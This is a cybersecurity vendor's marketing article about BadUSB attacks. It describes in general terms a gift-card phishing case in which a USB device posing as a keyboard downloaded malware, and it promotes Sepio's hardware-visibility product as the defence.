Bad USB (or BadUSB) attacks can compromise computer systems, posing serious security risks and hardware-based attacks. This can happen when the bad USB device contains malicious firmware. Or has been modified to behave in unexpected and harmful ways, a so-called Bad USB attack.
Once connected to a computer, the malicious Bad USB (BadUSB) device can execute commands. Exploit vulnerabilities, or install malware without the user’s knowledge or consent.
Bad USB Attack Study
A company was awarded with a $50 Best-Buy gift card in a letter. Which also included a bad USB thumb drive. Once plugged in, the USB would display a list of items available for purchase using the gift card. The company did not give in to the phishing attempt and contacted security experts from a cybersecurity firm instead. Who revealed that the company encountered a Bad USB attack (BadUSB). This was not the first targeted attack on the hospitality industry.
Known threat actors like DarkHotel and RevengeHotels have a history of activity in this industry. This attack is notable for utilizing a physical rogue device that can impersonate a genuine keyboard, effectively evading existing EPS/EDR solutions.
Only diving “deeper” into the physical layer visibility can provide the adequate protection.
After conducting an investigation, a cybersecurity firm determined that the USB (BadUSB) device was responsible for the attack. The device – known as “Bad USB” – functions as a keyboard to perform keystrokes that launch commands to download and install malware onto the computer.
To install the malware, the device triggered a number of keystrokes that launched a PowerShell command which then downloaded a more cumbersome PowerShell script. Ultimately, this leads to the installation of malware.
What makes it particularly alarming is that it can appear nearly indistinguishable from a regular USB device to an unsuspecting user. This makes it challenging for individuals to identify whether the device they are connecting to their computer is legitimate or compromised.
Bad USB Threat: Stealthy Attacks via Arduino Microcontroller
The attackers utilized an Arduino microcontroller ATMEGA32U4 in the Bad USB device’s programming. Enabling it to function as a trusted USB keyboard. However, the purpose of this device is to surreptitiously type malicious commands into the attached computer, in this case causing the installation of malware.
It is almost impossible to detect this type of attack. As these hacked devices are recognised as genuine HIDs by existing security software solutions. Hence, antivirus scans will not present any indication that a malicious attack is underway. The alternative is to employ advanced forensic methods. Physically dissecting and reverse engineering the device isn’t practical due to the sheer number of devices in use by organisation.
Ideally, an organisation will want to employ a security software solution that detects these hardware attacks. Something which Sepio has developed successfully.
Hardware Assets Management and Assets Visibility
Many times, enterprises’ IT and security teams struggle in providing complete and accurate visibility into their hardware assets. Especially in today’s extremely challenging IT/OT/IoT environment. This is due to the fact that often, there is a lack of visibility, which leads to a weakened policy enforcement of hardware access. This may result in security accidents, such as ransomware attacks, data leakage, etc.
To tackle this challenge, achieving comprehensive visibility into your hardware assets becomes essential. Irrespective of their characteristics or the connection interface exploited by attackers.
In essence, the risk associated with the use of USB devices, including the potential for bad USB attacks, emphasizes the necessity for holistic hardware asset management strategies. These strategies should encompass robust visibility, dynamic defense adaptations, and a proactive stance against potential vulnerabilities.
Sepio’s Leadership in Rogue Device and Bad USB Mitigation
Sepio is the leader in the Rogue Device Mitigation (RDM) market. It is disrupting the cybersecurity industry by uncovering hidden Bad USB attacks (BadUSB) operating over network. Sepio’s asset risk management platform, identifies, detects and handles all peripherals. No device goes unmanaged.
Sepio is the only company in the world to undertake physical layer visibility fingerprinting. Sepio calculates a digital fingerprint using the device descriptors of all connected peripherals. Them compares against a known set of malicious devices, automatically blocking any attacks, including bad USB (BadUSB). With Machine Learning, the software analyses device behavior to identify abnormalities, such as a mouse acting as a keyboard.
In addition to the deep physical layer visibility, a comprehensive policy enforcement mechanism recommends on best practice policy. And allows the administrator to define a strict, or more granular, set of rules for the system to enforce.
A holistic approach to cybersecurity is essential in today’s landscape, where attacks can come from various vectors, including physical ones like Bad USB devices.
Organizations should not only focus on traditional cybersecurity measures but also take into consideration the physical security of their infrastructure. This includes implementing measures to prevent unauthorized Bad USB devices from being connected to their networks, as well as monitoring and controlling the use of USB devices within the organization.
Sepio is at the forefront of providing protection for IT (Information Technology), OT (Operational Technology), IoT (Internet of Things), and peripheral infrastructures. Sepio solution not only secure these systems but also fortify them against the constantly evolving landscape of USB-based threats. This all-encompassing strategy is crucial for organizations aiming to shield their hardware and data from the ever-growing and intricate cyber threats.Bad USB (PDF)